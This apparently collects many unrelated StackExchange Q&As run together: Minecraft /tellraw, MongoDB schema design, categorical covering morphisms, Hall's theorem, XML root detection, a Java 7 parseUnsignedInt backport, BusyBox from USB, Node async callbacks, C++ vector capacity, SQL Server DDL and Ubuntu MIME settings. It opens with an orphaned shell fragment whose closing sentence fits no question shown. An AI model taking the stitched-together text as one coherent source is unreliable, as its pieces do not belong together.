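# Assumes GNU coreutils: `stat -c %U` prints the owning user name.
check_owner() {
    dir="$1"; expected="$2"
    actual="$(stat -c %U "$dir")"
    if [ "$actual" = "$expected" ]; then
        echo "OK: $dir owned by $expected"
        return 0
    else
        echo "MISMATCH: $dir owned by $actual, expected $expected"
        return 1
    fi
}

# Example: a directory we just created belongs to the current user.
tmpdir="$(mktemp -d)"
check_owner "$tmpdir" "$(whoami)"
rmdir "$tmpdir"
```

In the situation above you would run check_owner /data/db/journal mongodb before and after the chown to confirm the fix took.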
common-pile/stackexchange_filtered
How do I make the player name show up on a /tellraw command? So I am currently making a minecraft custom map (for 1.9). I want to make the player "say" something using /tellraw commands. I did figure out how to make the player name come up using /say commands, but still have no idea how to do it using the /tellraw command. How do I do that? Have you made any attempt to solve this yourself? Arqade works better when askers show effort to solve their own problems; we see that you have a problem you've worked on, and answerers respond to that. You also get a more specific answer that's tailored exactly to the part you're stuck on, and Arqade gets a very specific question. Everybody wins! I can try that... Does this answer your question? Is there a way to display a player name in /tellraw command? You'll need to use selectors. These are things like @a, @p, etc. (Look at the link for adding things like scoreboard). To use this in /tellraw, use the following: "extra":[{"selector":"@p"}] So, let's say we want a command to say "Hi! My name is ..." Try this: /tellraw @a {"text":"Hi! My name is ","extra":[{"selector":"@p"}]} To break it down, /tellraw @a @a means all, so this goes to everyone in the world {"text":"Hi! My name is ", The "text" part tells tellraw that the next part (denoted by :) in quotes is text to be displayed. "extra":[{"selector":"@p"}]} The "extra" tag says the next part is something extra (figures). Then, the "selector" tag says the next part is a selector, and "@p" means the nearest player from where the command is being run. Probably More than You Need to Know, Just Putting it Here Anyways To tell everyone in the world, use @a. To tell everyone with a score of 3 in the objective Kills, use @a[score_Kills=3,score_Kills_min=3] In English, it means "Anybody (@a) with a maximum score of 3 and a minimum score of 3".
This may sound weird, but since the only number with a maximum of 3 and a minimum of 3 is, well, 3, that command only targets players with 3 as their Kills score.
MongoDB Alternative Design Since it's really not possible to return a single embedded document (yet), what is a good database design alternative? Here is a situation. I have an object First. First has an array of Second objects. Second has an array of Third objects. db.myDb.findOne() { "_id" : ObjectId("..."), "Seconds" : [ { "Second Name" : "value", "Thirds" : [ { "Third Name" : "value" } ] } ] } I have a website that shows a list of First objects. You can select a First object and it will bring you to a page that shows First details which includes the list of Second objects. If you select a Second object, the same sort of thing happens. When pulling up a Third page, it doesn't seem right to have a query get the single First object, then somehow drill down in code to get the data for the correct Third object. It would be much easier to just get a single Third object directly, possibly by _id. Maybe I'm still too stuck in SQL land, but in this case my thought would be to create a collection for each of those types and have them reference each other, since I need to get individual objects down the tree, and don't get to keep a reference to an object on each request, like you would be able to in a non-web app. Would this be the correct way to solve this issue, or am I just not thinking clearly in document land? I think this would depend on the usage. If you are frequently needing to access the 'Second' or 'Third' items without the containing 'First', then perhaps they are better not being embedded. A question I have used to help me determine whether something might be better embedded or not is to ask myself whether it is part of it or related to it. E.g., does a 'First' actually contain one or more 'Seconds' (and so on), or are they separate things which happen to be related in some way?
On the face of it, I'd say a blog post contains comments (unless you have a compelling need to query the list of comments without knowledge of the posts), but a user/author probably does not contain a list of posts, rather they'd be linked in some way but reside in different collections. Cross-collection relationships can be achieved with MongoDB using DBRef. This is a special type which describes a relationship with another object. If your items do belong in their own collections, they can have a DBRef to point between each other. These could go whichever way round you want (i.e. a collection of them in the First, or each Second could have one pointing to its parent First). Example 1 - each parent has a collection of child references: db.firsts.findOne() { "_id" : ObjectId("..."), "Seconds" : [ { $ref : 'seconds', $id : <idvalue> }, { $ref : 'seconds', $id : <idvalue> }, { $ref : 'seconds', $id : <idvalue> } ] } db.seconds.findOne() { "_id" : ObjectId("..."), "Second Name" : "value", "Thirds" : [ { $ref : 'thirds', $id : <idvalue> }, { $ref : 'thirds', $id : <idvalue> } ] } db.thirds.findOne() { "_id" : ObjectId("..."), "Third Name" : "value" } Example 2 - each child has a reference to its parent db.firsts.findOne() { "_id" : ObjectId("...") } db.seconds.findOne() { "_id" : ObjectId("..."), "First" : { $ref : 'firsts', $id : <idvalue> }, "Second Name" : "value" } db.thirds.findOne() { "_id" : ObjectId("..."), "Second" : { $ref : 'seconds', $id : <idvalue> }, "Third Name" : "value" } Most of the MongoDB language drivers have a way of dealing with dbrefs in a neater way than on the console (normally using some kind of 'DBRef' class). Working this way will mean you have more database requests, but if it makes sense to your application, it's probably a fair compromise to make - particularly if the list of 'Seconds' or 'Thirds' in your example are commonly needed or key to interaction with the system or its functionality.
The second approach is most like what you would have using a traditional relational DB. The beauty of MongoDB is that it allows you to work relationally when it actually makes sense to do so, and not when it does not. Very flexible, and ultimately it depends on your data and application as to what makes sense for you. Ultimately the answer to your question of which method you should use depends on your application and the data it stores - not something we can tell from your example.
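To make the reference-following concrete, here is a minimal in-memory JavaScript sketch of the "each child has a reference to its parent" pattern; the resolve helper is hypothetical and not part of any MongoDB driver, which would instead expose the same idea through a DBRef class:

```javascript
// In-memory model of the "child points at parent" reference layout above.
// `resolve` is a hypothetical helper, not a MongoDB driver API.
const db = {
  firsts:  [{ _id: "f1" }],
  seconds: [{ _id: "s1", First:  { $ref: "firsts",  $id: "f1" }, "Second Name": "value" }],
  thirds:  [{ _id: "t1", Second: { $ref: "seconds", $id: "s1" }, "Third Name": "value" }],
};

function resolve(ref) {
  // Follow a { $ref, $id } pair to the document it points at.
  return db[ref.$ref].find((doc) => doc._id === ref.$id);
}

// Walk from a Third up to its First in two hops - in a real deployment
// this is two extra requests, one per reference followed.
const third = db.thirds[0];
const second = resolve(third.Second);
const first = resolve(second.First);
console.log(first._id); // f1
```

This makes the trade-off visible: fetching a Third directly is one lookup, and each level of ancestry costs one more.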
Categorification of covering morphisms Given a category $\mathsf{A}$, let $\mathsf{Fam}(\mathsf{A})$ be its free coproduct cocompletion (which is always extensive). This means every object has a unique up to iso presentation as a coproduct of connected objects. This category is really part of the data of a fibration $\Pi_0:\mathsf{Fam}(\mathsf{A})\longrightarrow \mathsf{Set}$ assigning to each object its set of connected components. There's also an adjunction $\Pi_0\dashv H$ where $H$ is the "discrete" functor taking a set $A$ to $A\cdot \mathbf{1}=\coprod_A\mathbf{1}$. In the book Galois Theories by Borceux and Janelidze, a neat process of abstraction leads to the following definition. Definition 6.5.9. An arrow $\alpha:A\longrightarrow B$ in $\mathsf{C}=\mathsf{Fam}(\mathsf A)$ is said to be a covering morphism if there exists an effective descent morphism $p:E\longrightarrow B$ such that the square below is a pullback. $$\require{AMScd} \begin{CD} E\times_BA @>{\eta_{E\times_BA}}>> H\Pi_0(E\times_BA)\\ @V{p^\ast\alpha}VV @VV{H\Pi_0(p^\ast\alpha)}V\\ E @>>{\eta_E}> H\Pi_0(E) \end{CD}$$ Concretely, the unit $\eta$ takes a point to its connected component. Since I'm having a hard time visualizing this definition as it's presented, I thought of abstracting the definition of a fiber bundle, and then trying to abstract the definition of a covering space as a fiber bundle with discrete fibers. Definition 1. A trivial fiber bundle with fiber $F$ is an arrow which is isomorphic to $\pi_1:B\times F\longrightarrow B$ in $\mathsf{C}/B$. Definition 2. Let $\mathcal M$ be a class of arrows in a site $\mathsf{C}$. An arrow $\pi:E\longrightarrow B$ is said to be locally in $\mathcal M$ if there's a covering $\left\{u_i:U_i\rightarrow B \right\}$ such that $u_i^\ast\pi$ are all in $\mathcal M$. Definition 3. A fiber bundle with fiber $F$ is a locally trivial fiber bundle with fiber $F$, i.e. it is locally in the class of projections $X\times F\longrightarrow X$.
If $\mathsf{C}$ is complete, trivial fiber bundles are stable under base change (with invariant fiber). If $\mathsf{C}$ is a complete superextensive site, fiber bundles are stable under base change, also with invariant fiber. So complete superextensive sites look like especially good settings for working with fiber bundles. Definition 4. A covering morphism is a fiber bundle such that $F$ is in the essential image of $H$. Why is this definition poor, and why does it not capture what we want a covering morphism to capture? How does it compare to definition 6.5.9 (e.g if we take the extensive topology on $\mathsf{C}$)? What do we want a covering morphism to capture? For $p = \coprod U_i \rightarrow B$ the two conditions are the same. @DimitriChikhladze I'm not even close to seeing this. Could you post an elaboration? Can't think of all the details now, but the fact that the square is a pullback means that on any connected component $U$ of $E$ the morphism $p^\ast\alpha$ is of the form $F\times U$ where $F$ is in the image of $H$. So if $E$ is taken to be $\coprod U_i$ with the $U_i$ connected you get the same condition. But $F$ may vary with the $i$. I don't think superextensivity is necessary for fiber bundles to be stable under base change: just being a site means that coverings pull back. "Categorification" seems like the wrong term here. This sits at the same category level as ordinary covering maps (that is, taking place in a 1-category). I too was thinking you meant categorification in the sense of moving up a categorical level; this was the topic of my PhD thesis... First, definition 3 must be mended to allow varying fibers, so a fiber bundle is locally some product projection. Then, definition 4 also allows for varying discrete fibers. Whenever both definitions (this and 6.5.9) are applicable, they coincide. We'll work our way into increasing generality starting with spaces. $\mathsf{Top}$ with its usual topology is a superextensive site. 
This allows us to replace every covering family with a single arrow - its associated cover (see below). Being an extensive category, $\mathsf{Top}$ has universal coproducts, which ensures that the squares on the left below are pullbacks iff the right one is. $$\require{AMScd} \begin{CD} U_i\times F_i @>>> A\\ @VVV @VV{\alpha}V\\ U_i @>>> B \end{CD}\forall i\iff\require{AMScd} \begin{CD} \coprod_iU_i\times F_i @>>> A\\ @V{p^\ast\alpha}VV @VV{\alpha}V\\ \coprod_iU_i @>>{p}> B \end{CD}$$ This allows us to encapsulate the local triviality definition for fiber bundles in terms of a single base change. Next, for spaces, note the associated cover $p$ is an étale surjection. Étale surjections are effective descent morphisms of spaces, which suggests generalizing to such morphisms in general contexts. The problem is that we can't even write a pullback square with varying fibers if we replace $\coprod_iU_i$ by $E$. However, if we assume $\mathsf{C}$ is actually a free coproduct cocompletion, we may write $E\cong \coprod_iE_i$ where $E_i$ are the connected components of $E$. This yields a notion of a "generalized fiber bundle" - an arrow $\alpha$ for which there exists an effective descent morphism making the square below a pullback. $$\begin{CD} \coprod_iE_i\times F_i @>>> A\\ @VVV @VV{\alpha}V\\ \coprod_iE_i @>>{p}> B \end{CD}$$ Following the setting of spaces, say an arrow is a trivial covering morphism if it's a trivial fiber bundle with discrete fiber (in the essential image of the copower functor $H:A\mapsto \coprod_A\mathbf 1=A\cdot \mathbf 1$). Since $\mathsf{C}$ is extensive and has products, it is distributive, hence $E_i\times F_i\cong |F_i|\cdot E_i$. This shows the connected component decomposition of the total space of a trivial covering morphism simply has duplicates of the connected components of the base space, with multiplicity equal to the cardinality of the fiber (which is always given by $|\Pi_0(F_i)|$). Proposition.
Suppose $\mathsf C$ is a free coproduct cocompletion. Then $\alpha$ is a trivial covering morphism if and only if the square below is a pullback. $$\require{AMScd} \begin{CD} A @>{\eta_A}>> H\Pi_0(A)\\ @V{\alpha}VV @VV{H\Pi_0(\alpha)}V\\ B @>>{\eta_B}> H\Pi_0(B) \end{CD}$$ Proof. Let $B\cong\coprod_iB_i$ be the connected components decomposition of $B$. The pullback $B\times_{H\Pi_0(B)}H\Pi_0(A)$ is $\coprod_i | (\Pi_0\alpha)^\ast \left\{ i \right\}|\cdot B_i$ with projection on $B$ given componentwise by identities. The description for $\alpha$ as a trivial fiber bundle with discrete fibers is equivalent, since the components $\alpha:\coprod_i | (\Pi_0\alpha)^\ast \left\{ i \right\}|\cdot B_i\rightarrow \coprod_iB_i$ correspond by connectedness of $B_i$ to the identity. $\square$
A condition ensuring that a bipartite graph have a perfect matching There is a bipartite graph $G=(A,B,E)$ such that for every edge $(a,b)$ (where $a$ comes from $A$ and $b$ from $B$), $\deg(a) \geq \deg(b)$, and additionally $\deg(a) \geq 1$ for all $a \in A$. From this, how can I prove there is a matching which covers all of $A$? Have you tried using Hall's criterion? Yes, without success so far. Hint: Use Hall's criterion. In more detail, suppose that Hall's criterion didn't hold. Choose a set $X$ of minimal size satisfying $|N(X)| < |X|$. Show that $X$ is not empty, and let $Y = X \setminus \{x\}$ for some arbitrary $x \in X$. Show that $Y$ has a perfect matching with $N(Y)$, and prove that $N(N(Y))=Y$ by counting the edges connecting $Y$ and $N(Y)$ in two ways. Show that $\emptyset \neq N(x) \subseteq N(Y)$, and reach a contradiction.
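The claim can also be sanity-checked computationally; here is a brute-force Python sketch that tests Hall's criterion directly (equivalent, by Hall's theorem, to the existence of a matching covering $A$ — suitable for small graphs only, since it enumerates all subsets):

```python
# Brute-force check of Hall's criterion for small bipartite graphs.
# By Hall's theorem, the criterion holds iff a matching covers all of A.
from itertools import combinations

def has_matching_covering_A(A, B, edges):
    """Return True iff every subset X of A satisfies |N(X)| >= |X|."""
    neighbors = {a: {b for (x, b) in edges if x == a} for a in A}
    for r in range(1, len(A) + 1):
        for X in combinations(A, r):
            if len(set().union(*(neighbors[a] for a in X))) < len(X):
                return False
    return True

# deg(a) = 2 >= deg(b) = 2 on every edge, so a covering matching exists:
A, B = ["a1", "a2"], ["b1", "b2"]
edges = [("a1", "b1"), ("a1", "b2"), ("a2", "b1"), ("a2", "b2")]
print(has_matching_covering_A(A, B, edges))  # True

# Violating the degree condition can break it: here deg(a) = 1 < deg(b) = 2.
print(has_matching_covering_A(["a1", "a2"], ["b1"],
                              [("a1", "b1"), ("a2", "b1")]))  # False
```

The second example shows why the hypothesis matters: with deg(a) < deg(b) on some edge, the set X = {a1, a2} has only one neighbor.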
iPhone check format of a file to parse I'm doing an app which can parse XML files generated by different programs. I need to check the first line of the file to detect which program has generated the xml and call the correct method to parse it. i.e. one of the generated files starts with this line: <PROFILE XYZ="1"> another program generates the file starting with this line: <AppXYZ DBVersion="<IP_ADDRESS>"> I need to check this line. Any help is appreciated. Thanks, Max It's XML, so just parse it as XML. Check the first element and decide from there. SAX or DOM, either works. What I'm not able to do is check the first element, because it's the root element. The file is like this: blah blahblah blah @masgar: Root elements are just like any other element. Just get the name of the first element, and if the name is "profile" then you're home free, no?
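The "just parse it and check the root element" advice looks like this in outline; a Python sketch for illustration only (the actual app would use NSXMLParser or similar on iPhone — the tag names are taken from the question, and the "program A"/"program B" labels are made up):

```python
# Dispatch on the root element's tag name to pick the right parser.
import xml.etree.ElementTree as ET

def detect_generator(xml_text):
    root = ET.fromstring(xml_text)  # the root IS the first element
    if root.tag == "PROFILE":
        return "program A"
    if root.tag == "AppXYZ":
        return "program B"
    return "unknown"

print(detect_generator('<PROFILE XYZ="1"><entry/></PROFILE>'))          # program A
print(detect_generator('<AppXYZ DBVersion="1.2.3"><entry/></AppXYZ>'))  # program B
```

The point is that the root element is no harder to inspect than any other: every XML parser hands it to you first.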
Porting parseUnsignedInt to java1.7 I was using java1.8 which has parseUnsignedInt(). I was told that we have to use java1.7 since that is on the system. I thought I could just port the java.lang.Integer.java, java.lang.Long.java and java.lang.annotation.Native.java functions and compile with my code. This allowed the code to compile without errors. When I run I get the following error: Exception in thread "Thread-6" java.lang.NoSuchMethodError: java.lang.Integer.parseUnsignedInt(Ljava/lang/String;)I The eclipse debugger can't seem to find the function either. What do I have to do to get this working? I doubt you installed it in the proper jar file within the proper package. It is picking your JDK version. It may be an import problem. If you can't get it to work it would be easier to just write your own utility methods to accomplish that requirement. Parsing integers and longs is not that difficult. You're trying to override core java.lang libraries? Yes, I am trying to override the java.lang libraries by compiling versions of Integer.java, Long.java and annotation/Native.java in the src directory java/lang of my project. As stated, I took the code from 1.8 for these files and basically placed them into my project (as answer 1 suggests), so the compile is correct, but at runtime it cannot find them, thus the error above. I just need to figure out how to get the class files in my java\lang to be used instead of what's in the JRE library, since 1.7 does not have the parseUnsignedInt() function. You cannot add your own Integer class in the java.lang package because of JDK protection mechanisms. You have to write it in your own class, e.g. as a static method, and change all invocations. Ah, yes I see. I tried renaming it to not cause interference with the Integer package and I got that error. Ok. I'll put it in my base function so as to change the code in the least possible way and rip it out when we go to java1.8 in a year or so... Thanks.
You might be better off with a simple, easy to understand, maintainable solution, like long l = Long.parseLong(string); if(l < 0 || l >= 1L<<32) throw new IllegalArgumentException(); int result = (int) l; instead of copying the JDK code… The method parseUnsignedInt was introduced with Java 1.8, as it is documented in its javadoc (mind the @since 1.8): /** * Parses the string argument as an unsigned decimal integer. The * characters in the string must all be decimal digits, except * that the first character may be an an ASCII plus sign {@code * '+'} ({@code '\u005Cu002B'}). The resulting integer value * is returned, exactly as if the argument and the radix 10 were * given as arguments to the {@link * #parseUnsignedInt(java.lang.String, int)} method. * * @param s a {@code String} containing the unsigned {@code int} * representation to be parsed * @return the unsigned integer value represented by the argument in decimal. * @throws NumberFormatException if the string does not contain a * parsable unsigned integer. * @since 1.8 */ public static int parseUnsignedInt(String s) throws NumberFormatException { return parseUnsignedInt(s, 10); } But the JDK also contains the sources, so you could write your own parseUnsignedInt method in your own class, similar to the implementation contained in Java 8 if the Java 8 license allows that. See http://hg.openjdk.java.net/jdk8/jdk8/jdk/file/687fd7c7986d/src/share/classes/java/lang/Integer.java Line 661 ff For details about security (i.e. why you can't place your own Integer class in java.lang package), option to overrule this security, and a reason why you should not (or better - why you are not allowed to), see selected answer in Why I am able to re-create java.lang package and classes? So, you will have to implement your own class in your own package: package com.yourname; /* * Contains code from OpenJDK Java8, Copyright (c) 1994, 2013, Oracle and/or its affiliates. * TODO add more info from Oracle class comment here. 
*/ public class IntCompatUtilities { public static int parseUnsignedInt(String s) throws NumberFormatException { return parseUnsignedInt(s,10); } public static int parseUnsignedInt(String s, int radix) throws NumberFormatException { //TODO content from OpenJDK 8's Integer.parseUnsignedInt(String,int) here. //instead of return parseInt(s, radix); change to return Integer.parseInt(s, radix); //instead of throw NumberFormatException.forInputString(s); throw new NumberFormatException(...) } } And then, let all your callers call com.yourname.IntCompatUtilities.parseUnsignedInt(...) Thank you for the reference. This is what I have done and it didn't work completely. It allowed the code to compile but it was not runnable. Re-phrased my answer (added detailed instructions on what to do).
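Alternatively, the parse-as-long-and-range-check idea from the comments avoids copying OpenJDK code entirely; a minimal sketch (class name is a placeholder, and this only covers the default radix-10 case):

```java
// Java-7-compatible stand-in for Integer.parseUnsignedInt, using the
// parse-as-long-and-range-check idea from the comments above.
// The class and method names are placeholders, not a JDK API.
public class IntCompatUtilities {

    public static int parseUnsignedInt(String s) {
        long value = Long.parseLong(s);
        if (value < 0 || value >= (1L << 32)) {
            throw new NumberFormatException("out of unsigned int range: " + s);
        }
        // Values in [2^31, 2^32) wrap to negative ints, matching Java 8.
        return (int) value;
    }

    public static void main(String[] args) {
        System.out.println(parseUnsignedInt("0"));          // 0
        System.out.println(parseUnsignedInt("4294967295")); // -1 (2^32 - 1)
    }
}
```

A long comfortably holds every unsigned 32-bit value, so the range check plus a narrowing cast reproduces the Java 8 bit pattern.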
How to run Ubuntu utils from USB? How can I extract OS utils/commands like "ps, who, lsof, netstat..." and run them from my USB? I need to extract these tools from a clean Linux OS and run them on an infected computer. I tried just copying these tools from /bin but it is not working. You need statically linked binaries without external libraries (/lib/*.so files). A major tool providing many commands on embedded devices is busybox. You can probably find a static version for your OS at busybox.net. My busybox... busybox BusyBox v1.30.0 (2018-12-30 22:25:27 CET) multi-call binary. BusyBox is copyrighted by many authors between 1998-2015. Licensed under GPLv2. See source distribution for detailed copyright notices. Usage: busybox [function [arguments]...] or: busybox --list[-full] or: busybox --show SCRIPT or: busybox --install [-s] [DIR] or: function [arguments]... BusyBox is a multi-call binary that combines many common Unix utilities into a single executable. Most people will create a link to busybox for each function they wish to use and BusyBox will act like whatever it was invoked as.
Currently defined functions: [, [[, acpid, add-shell, addgroup, adduser, adjtimex, ar, arch, arp, arping, ash, awk, base64, basename, bc, blkdiscard, blkid, blockdev, bootchartd, brctl, bunzip2, bzcat, bzip2, cal, cat, chat, chattr, chgrp, chmod, chown, chpasswd, chpst, chroot, chrt, chvt, cksum, clear, cmp, comm, conspy, cp, cpio, crond, crontab, cryptpw, cttyhack, cut, date, dc, dd, deallocvt, delgroup, deluser, depmod, devmem, df, dhcprelay, diff, dirname, dmesg, dnsd, dnsdomainname, dos2unix, dpkg, dpkg-deb, du, dumpkmap, dumpleases, echo, ed, egrep, eject, env, envdir, envuidgid, expand, expr, factor, fakeidentd, false, fatattr, fbset, fbsplash, fdflush, fdformat, fdisk, fgconsole, fgrep, find, findfs, flash_eraseall, flash_lock, flash_unlock, flashcp, flock, fold, free, freeramdisk, fsck, fsck.minix, fsfreeze, fstrim, fsync, ftpd, ftpget, ftpput, fuser, getopt, getty, grep, groups, gunzip, gzip, halt, hd, hdparm, head, hexdump, hexedit, hostid, hostname, httpd, hush, hwclock, i2cdetect, i2cdump, i2cget, i2cset, id, ifconfig, ifenslave, ifplugd, inetd, init, inotifyd, insmod, install, ionice, iostat, ip, ipaddr, ipcalc, ipcrm, ipcs, iplink, ipneigh, iproute, iprule, iptunnel, kbd_mode, kill, killall, killall5, klogd, last, less, link, linux32, linux64, linuxrc, ln, loadfont, loadkmap, logger, login, logname, losetup, lpd, lpq, lpr, ls, lsattr, lsmod, lsof, lspci, lsscsi, lsusb, lzcat, lzma, lzop, lzopcat, makedevs, makemime, man, md5sum, mdev, mesg, microcom, mkdir, mkdosfs, mke2fs, mkfifo, mkfs.ext2, mkfs.minix, mkfs.vfat, mknod, mkpasswd, mkswap, mktemp, modinfo, modprobe, more, mount, mountpoint, mpstat, mt, mv, nameif, nbd-client, nc, netstat, nice, nl, nmeter, nohup, nologin, nproc, ntpd, nuke, od, openvt, partprobe, passwd, paste, patch, pgrep, pidof, ping, ping6, pipe_progress, pivot_root, pkill, pmap, popmaildir, poweroff, powertop, printenv, printf, ps, pscan, pstree, pwd, pwdx, raidautorun, rdate, rdev, readlink, readprofile, realpath, reboot, 
reformime, remove-shell, renice, reset, resize, resume, rev, rm, rmdir, rmmod, route, rpm, rpm2cpio, rtcwake, run-init, run-parts, runlevel, runsv, runsvdir, rx, script, scriptreplay, sed, sendmail, seq, setarch, setconsole, setfattr, setfont, setkeycodes, setlogcons, setpriv, setserial, setsid, setuidgid, sh, sha1sum, sha256sum, sha3sum, sha512sum, showkey, shred, shuf, slattach, sleep, smemcap, softlimit, sort, split, ssl_client, start-stop-daemon, stat, strings, stty, su, sulogin, sum, sv, svc, svlogd, svok, swapoff, swapon, switch_root, sync, sysctl, syslogd, tac, tail, tar, taskset, tc, tcpsvd, tee, telnet, telnetd, test, tftp, tftpd, time, timeout, top, touch, tr, traceroute, traceroute6, true, truncate, tty, ttysize, tunctl, tune2fs, ubiattach, ubidetach, ubimkvol, ubirename, ubirmvol, ubirsvol, ubiupdatevol, udhcpc, udhcpd, udpsvd, uevent, umount, uname, uncompress, unexpand, uniq, unix2dos, unlink, unlzma, unlzop, unxz, unzip, uptime, users, usleep, uudecode, uuencode, vconfig, vi, vlock, volname, w, wall, watch, watchdog, wc, wget, which, who, whoami, whois, xargs, xxd, xz, xzcat, yes, zcat, zcip
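The "link to busybox for each function" mechanism works because busybox dispatches on the name it was invoked as (argv[0]); a small shell sketch of the same multi-call trick, using a throwaway script rather than busybox itself:

```shell
# argv[0]-based dispatch: the same trick busybox uses for its applet
# symlinks. Builds a throwaway multi-call script, not busybox itself.
workdir="$(mktemp -d)"
cat > "$workdir/multicall" <<'EOF'
#!/bin/sh
case "$(basename "$0")" in
    hello) echo "hello applet" ;;
    bye)   echo "bye applet" ;;
    *)     echo "unknown applet: $0" ;;
esac
EOF
chmod +x "$workdir/multicall"

# One file, many names - each symlink behaves like a different tool.
ln -s multicall "$workdir/hello"
ln -s multicall "$workdir/bye"

"$workdir/hello"   # prints: hello applet
"$workdir/bye"     # prints: bye applet
```

This is also what busybox --install [-s] DIR automates: it creates one link per applet name so a single static binary on the USB stick can stand in for the whole toolset.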
Issues retrieving a value to use for comparison in an if statement I have the following variable: var userFound = false; In the event this turns true, I would like the below if statement to be executed: if (userFound) { // res.render('pickup/errorAlreadyDelivered', {}); } However, the issue is that it does not take into account the value change of the variable inside of a for loop above. Below is a larger portion of the code. var userFound = false; let sql = `SELECT box_id, cubby_id, comport, deliveredToUser FROM recipients WHERE package_password = ?`; connection.query(sql, [req.session.sessionUserPackagePassword], function(err, rows, fields) { if (!err) { for (var i = 0; i < rows.length; i++) { // Make the comparison case insensitive if ((rows[i].deliveredToUser).toLowerCase() == `no`) { userFound = true; var comport = rows[i].comport; var command = "open" + rows[i].cubby_id; var commandClose = "close" + rows[i].cubby_id; var commandStatus = "status" + rows[i].cubby_id; console.log(command); console.log(comport); var options = { scriptPath: 'python/scripts', args: [command, comport, commandClose, commandStatus] // pass arguments to the script here }; PythonShell.run('controlLock.py', options, function(err, results) { if (err) { res.render('errorConnection', {}); } console.log('results: %j', results); }); } } // If the query fails to execute } else { console.log('Error while performing Query.'); res.render('errorConnection', {}); } }); connection.end(); if (userFound) { // res.render('pickup/errorAlreadyDelivered', {}); } Any help would be greatly appreciated. You could simply move res.render() to the line where you set userFound = true.
It's actually the opposite: if there is no instance that matches if ((rows[i].deliveredToUser).toLowerCase() == `no`) {, that's where I want to render the page res.render('pickup/errorAlreadyDelivered', {});. The issue when I put the else-if condition inside the for loop is that it doesn't go through all of the rows before rendering the page. I see. You can let the for loop fully traverse and move the if-test (if (userFound)) directly after the for loop. Even when if (userFound) is moved right after the for loop, it doesn't seem to see the updated value of userFound, which is now true, so it assumes it's false. Hence, when no condition is satisfied this if statement is not executed. It seems like any value set inside of the for loop stays inside of the for loop. Any advice, anyone? The callback where you set userFound to true is run after the if (userFound) line runs, even though they are not written in that order. connection.query is an async function. Try putting the userFound logic inside the callback so that it runs after the query result is received and userFound is set to true.
connection.query(sql, [req.session.sessionUserPackagePassword], function(err, rows, fields) { if (!err) { for (var i = 0; i < rows.length; i++) { // Make the comparison case insensitive if ((rows[i].deliveredToUser).toLowerCase() == `no`) { userFound = true; var comport = rows[i].comport; var command = "open" + rows[i].cubby_id; var commandClose = "close" + rows[i].cubby_id; var commandStatus = "status" + rows[i].cubby_id; console.log(command); console.log(comport); var options = { scriptPath: 'python/scripts', args: [command, comport, commandClose, commandStatus] // pass arguments to the script here }; PythonShell.run('controlLock.py', options, function(err, results) { if (err) { res.render('errorConnection', {}); } console.log('results: %j', results); }); } } // If the query fails to execute } else { console.log('Error while performing Query.'); res.render('errorConnection', {}); } connection.end(); if (userFound) { // res.render('pickup/errorAlreadyDelivered', {}); } });
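The timing issue can be seen in isolation with a simulated asynchronous query; in this sketch fakeQuery stands in for connection.query (all names are illustrative only):

```javascript
// Why the userFound check must live inside the callback: fakeQuery
// stands in for connection.query and delivers its rows asynchronously.
function fakeQuery(sql, cb) {
  setTimeout(() => cb(null, [{ deliveredToUser: "No" }]), 0);
}

let userFound = false;

fakeQuery("SELECT ...", (err, rows) => {
  for (const row of rows) {
    if (row.deliveredToUser.toLowerCase() === "no") userFound = true;
  }
  // Correct place for the check: the rows have arrived by now.
  console.log("inside callback:", userFound); // true
});

// Wrong place: this line runs before the callback has fired.
console.log("right after the call:", userFound); // false
```

Running it prints the "right after the call" line first, still false - exactly the ordering described in the answer above.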
Enforce increase of vector capacity by implementation defined factor when reserving So I have a class wrapping a vector which has the invariant that vec.capacity() > vec.size() so I can always (temporarily) emplace_back one more element without reallocation. My first idea was to call vec.reserve(vec.size() + 1) for every insertion, but this is inefficient as seen in this stackoverflow thread, and insert is called very often. (So is pop_back, therefore the maximal number of elements is way lower than the amounts of insert calls.) My current implementation simplified looks something like this: #include <vector> template<typename T> class VecWrapper { private: std::vector<T> vec; public: [[nodiscard]] auto insert(T new_element) { vec.emplace_back(std::move(new_element)); if (vec.capacity() == vec.size()) { vec.emplace_back(vec.back()); vec.pop_back(); } } }; Is there a less awkward way to trigger a capacity expansion of the vector according to the implementation defined strategy? Note that T is not necessarily default constructible. "My first idea was to call vec.reserve(vec.size() + 1) for every insertion" Couldn't you just reserve more than one element? Like maybe size * 2 or * 1.5 or something? I'm not sure I understand the point of this question. If you didn't do the check, you would get just as many reallocations as if you do this check, and the reallocations would reallocate the same amount of memory. And the reallocations still take place in insert The only difference is a very slight change in exactly when reallocations occur; size and reserve will simply never be equal. So... why is that important? So, the idea is to reserve the memory before it's needed rather than when it's needed? @NicolBolas Reserving like size*2 is exactly what I want, but instead of using my own magic number, I'd very much prefer the expansion strategy of the respective compiler. 
I want to establish the invariant to be able (for other reasons) to temporarily insert one more element without invalidating iterators. @PeteBecker Yes, like reserve one insert earlier than the standard vector would.
How to show results of DDL statement (like Oracle does) in SQL Server Management Studio? Is there a way to show the results of DDL statements such as CREATE/ALTER after they are "run" in the query window? By default it just shows "command(s) completed". Is there a way to see something similar to the results Oracle shows from the same commands? "command(s) completed" after a create table command is very similar to the 'table created' Oracle SQL*Plus message. If you need a desc my_table you can execute sp_help my_table Thanks, that's what I'll use. Appreciate the quick response. You can also use sp_helptext my_sp to describe a stored procedure, function, or view
17.10 seahorse-nautilus mime association for "decrypt file", getting really frustrated at the ubuntu way I'm a proficient linux user; just recently I've been learning how to deploy servers with ansible+vagrant, so I just spent an entire week on CentOS and various other flavours of linux getting a complex network to work. I need to encrypt/decrypt from the nautilus context menu, so I installed seahorse-nautilus and everything went fine. I created a key and everything was working; then I accidentally opened a .pgp file with textedit by selecting "open with" from nautilus, and this changed the mime association. I can't figure out where ubuntu actually stores mime associations, and I can't even find decent documentation and specs anymore about everything that ubuntu does its own way. I can't find where it changed it; I looked at all the usual places for mime associations and couldn't find the added association between pgp and textedit. I uninstalled seahorse-nautilus and reinstalled it (including a nautilus -q), but no luck, the textedit mime association stays. Can somebody please explain to me where ubuntu adds mime associations made with nautilus when you click "open with application", and how to either prevent that from happening or change it afterwards? I'm getting really frustrated at ubuntu in recent years; it seems like it's not even linux anymore, and this might really be the last straw. I might go to real linux like arch in the next couple of days and forget this bloatware that ubuntu has become. I checked /usr/share/applications/ etc., $HOME/.local/share/ etc., /usr/share/gdm/greeter etc.; I found many different config files holding mime associations, but nothing regarding pgp. Please help. Possible duplicate of Where are file associations stored? Did you check ~/.config/mimeapps.lst ? You don't have sufficient rep to post a comment. With more details you could change this comment, in the form of an answer, into a real 